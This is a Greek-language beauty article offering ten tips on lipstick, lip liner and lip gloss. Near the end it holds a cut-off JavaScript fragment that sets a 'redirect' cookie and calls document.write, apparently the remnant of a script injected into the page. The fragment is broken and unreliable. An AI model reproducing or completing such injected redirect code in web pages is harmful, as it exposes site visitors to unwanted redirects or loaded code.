Μυστικά μακιγιάζ για τα χείλη

Τα χείλη αποτελούν από τα πιο βασικά σημεία που πρέπει να προσέχουμε στο μακιγιάζ  μας. Μη ξεχνάτε άλλωστε ότι ακόμη και καθόλου μακιγιάζ να μην υπάρχει στο υπόλοιπο πρόσωπο, αρκεί ένα όμορφο βάψιμο στα χείλη για να λάμπετε ολόκληρη.

 

Για ένα τέλειο αποτέλεσμα στα χείλη, σας φανερώνουμε μερικά μυστικά:

1. Για μεγάλα χείλη: Αποφύγετε τα πολύ έντονα γκλος κραγιόν και τις πολύ σκούρες αποχρώσεις.

2. Για μεγάλη διάρκεια: Τοποθετήστε το περίγραμμα που έχετε επιλέξει εξωτερικά φτιάχνοντας την γραμμή και επιλέξτε ένα μολύβι στο χρώμα των χειλιών σας, με το οποίο θα βάψετε τα χείλη εσωτερικά πριν βάλετε το κανονικό σας κραγιόν.

3. Για σαρκώδη χείλη: Τοποθετήστε το περίγραμμα που επιθυμείτε σε συνδιασμό με το κραγιόν σας, και κατόπιν (μόνο στο κάτω χείλος) χρησιμοποιήστε ένα λίγο πιο σκούρο τόνο κραγιόν το οποίο και θα εφαρμόσετε μόνο στο εσωτερικό σημείο του κάτω χείλους.

4. Την ημέρα: Να διαλέγετε απαλές και όμορφες αποχρώσεις οι οποίες αποδίδουν απλότητα και φυσικότητα. Οι σκούρες και έντονες αποχρώσεις είναι καλύτερα να εφαρμόζονται μόνο τις βραδινές ώρες.

5. Για να μην τρέξει το χρώμα στις άκρες των χειλιών: τοποθετήστε λίγο κονσίλερ γύρω από τα χείλη. Θα βοηθήσει το χρώμα να παραμείνει στη θέση του.

6. Εαν έχετε σκασμένα χείλη: Μισή ώρα πριν τοποθετήσετε το κραγιόν εφαρμόστε λίγο βούτυρο κακάο.

7. Εαν διαθέτετε μεγάλα χείλη: αποφύγετε τα πολύ ανοιχτά χρώματα γιατί κάνουν τα χείλη σας να φαίνονται ακόμη μεγαλύτερα. Προτιμήστε τις φυσικές και λίγο πιο σκούρες αποχρώσεις.

8. Για πιο αισθητική λάμψη: Εφόσον τοποθετήσετε το περίγραμμα και το κραγιόν σας, περάστε ένα γυαλιστερό λιπ γκλος μόνο στο κάτω χείλος.

9. Εάν επιλέξετε κόκκινο κραγιόν: μην βάψετε υπερβολικά τα μάτια σας. Συνδυάστε το κόκκινο κραγιόν με ένα γενικότερα ελαφρύ μακιγιάζ σε όλο το πρόσωπο. Μία φυσική μπεζ σκιά, ένα πολύ απαλό φυσικού τόνου ρούζ και λίγο μάσκαρα είναι αρκετά.

10. Χρησιμοποιείτε το ειδικό πινέλο για την εφαρμογή του κραγιόν σας χείλη σας. Το αποτέλεσμα είναι πολύ καλύτερο και σταθερό.

 
e=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply